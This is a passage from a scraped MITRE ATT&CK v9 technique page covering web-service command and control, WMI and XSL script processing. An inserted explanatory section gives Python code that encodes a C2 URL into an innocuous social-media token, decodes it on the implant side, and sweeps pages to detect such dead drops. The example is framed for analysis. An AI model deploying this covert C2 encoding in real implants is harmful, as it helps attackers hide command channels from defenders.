The return traffic may occur in a variety of ways, depending on the Web service being utilized. For example, the return traffic may take the form of the compromised system posting a comment on a forum, issuing a pull request to a development project, updating a document hosted on a Web service, or sending a Tweet. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1102/003"> .003 </a> </td> <td> <a href="/versions/v9/techniques/T1102/003"> One-Way Communication </a> </td> <td> Adversaries may use an existing, legitimate external Web service as a means for sending commands to a compromised system without receiving return output over the Web service channel. Compromised systems may leverage popular websites and social media to host command and control (C2) instructions. Those infected systems may opt to send the output from those commands back over a different C2 channel, including to another distinct Web service. Alternatively, compromised systems may return no output at all in cases where adversaries want to send instructions to systems and do not want a response. </td> </tr> <tr class="technique"> <td colspan="2"> <a href="/versions/v9/techniques/T1047"> T1047 </a> </td> <td> <a href="/versions/v9/techniques/T1047"> Windows Management Instrumentation </a> </td> <td> Adversaries may abuse Windows Management Instrumentation (WMI) to achieve execution. WMI is a Windows administration feature that provides a uniform environment for local and remote access to Windows system components. It relies on the WMI service for local and remote access, and on server message block (SMB) and remote procedure call (RPC) for remote access. The RPC endpoint mapper listens on TCP port 135. 
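<p> The Dead Drop Resolver entry (T1102.001) above says the C2 address is posted on a legitimate service in "embedded (and often obfuscated/encoded)" form. The following is an added example, not ATT&CK content and not code from any malware family or analysis tool, showing both sides of that exchange on a constructed page from a fictitious web service: the operator side encodes a C2 URL into an innocuous-looking profile token, the implant side locates its marker and decodes it, and the analyst side, having recovered the key from a sample, sweeps every base64-shaped token on the page so that it still finds the drop if the marker changes. The XOR-then-base64 obfuscation, the key <code>k9</code>, the <code>ref=</code> marker and the RFC 5737 documentation address used as the C2 are all assumptions of the example. </p>

```python
import base64
import binascii
import re

KEY = b"k9"                               # constructed: the XOR key an implant would carry in its binary
C2_URL = "https://203.0.113.7:8443/gate"  # constructed: RFC 5737 documentation address, not a real host

# Tokens are urlsafe base64 with the '=' padding stripped, so they look like ordinary identifiers.
MARKER_RE = re.compile(r"ref=([A-Za-z0-9_-]{16,})")   # what the implant looks for
TOKEN_RE = re.compile(r"[A-Za-z0-9_-]{16,}")          # what an analyst sweep tries
URL_SHAPE_RE = re.compile(r"^(https?://)?[A-Za-z0-9.-]+(:\d{1,5})?(/\S*)?$")


def xor(data: bytes, key: bytes) -> bytes:
    """Repeating-key XOR; the same call encodes and decodes."""
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))


def encode_resolver(url: str, key: bytes) -> str:
    """Operator side: turn a C2 URL into a token that can sit inside a bio or comment."""
    return base64.urlsafe_b64encode(xor(url.encode("ascii"), key)).decode("ascii").rstrip("=")


def try_decode(token: str, key: bytes):
    """Decode a candidate token; return the URL only if the result is printable and URL-shaped."""
    try:
        raw = base64.urlsafe_b64decode(token + "=" * (-len(token) % 4))
    except (binascii.Error, ValueError):
        return None
    try:
        text = xor(raw, key).decode("ascii")
    except UnicodeDecodeError:
        return None
    if not text.isprintable() or not URL_SHAPE_RE.match(text):
        return None
    return text


def resolve_c2(page: str, key: bytes):
    """Implant side: fetch the page (here, a string), find the marker and recover the C2 address."""
    m = MARKER_RE.search(page)
    return try_decode(m.group(1), key) if m else None


def scan_for_dead_drops(page: str, key: bytes):
    """Analyst side: with the key in hand, test every long token rather than trusting the marker."""
    found = (try_decode(tok, key) for tok in TOKEN_RE.findall(page))
    return [url for url in found if url]


# Constructed page from a fictitious social service: one real drop plus a benign base64 decoy.
SAMPLE_PAGE = f"""<html><body>
<div class="bio">Coffee, hiking, weekend photography. ref={encode_resolver(C2_URL, KEY)}</div>
<div class="post">Great game last night! Token for the raffle: aGVsbG8gd29ybGQhIQ==</div>
</body></html>"""

if __name__ == "__main__":
    print("token on page:", encode_resolver(C2_URL, KEY))
    print("implant resolves:", resolve_c2(SAMPLE_PAGE, KEY))
    print("analyst sweep finds:", scan_for_dead_drops(SAMPLE_PAGE, KEY))
```

<p> The decoy token decodes under the key to unprintable bytes and is dropped, which is why the sweep validates the shape of the plaintext instead of reporting every decodable string; on a real page that filter is what keeps the false-positive rate tolerable. The traffic itself is an ordinary TLS fetch of a popular site, which is the cover the parent T1102 entry describes. </p>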
</td> </tr> <tr class="technique"> <td colspan="2"> <a href="/versions/v9/techniques/T1220"> T1220 </a> </td> <td> <a href="/versions/v9/techniques/T1220"> XSL Script Processing </a> </td> <td> Adversaries may bypass application control and obscure execution of code by embedding scripts inside XSL files. Extensible Stylesheet Language (XSL) files are commonly used to describe the processing and rendering of data within XML files. To support complex operations, the XSL standard includes support for embedded scripting in various languages. </td> </tr> </tbody> </table> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> <footer class="footer p-3"> <p> © 2015-2021, The MITRE Corporation. MITRE ATT&CK and ATT&CK are registered trademarks of The MITRE Corporation. </p> <p> <small> <a href="/versions/v9/resources/changelog.html" class="footer-link" title="ATT&amp;CK content version 9.0&#013;Website version 3.3.1">ATT&CK v9.0</a> </small> </p> </footer> </div> </body> </html>
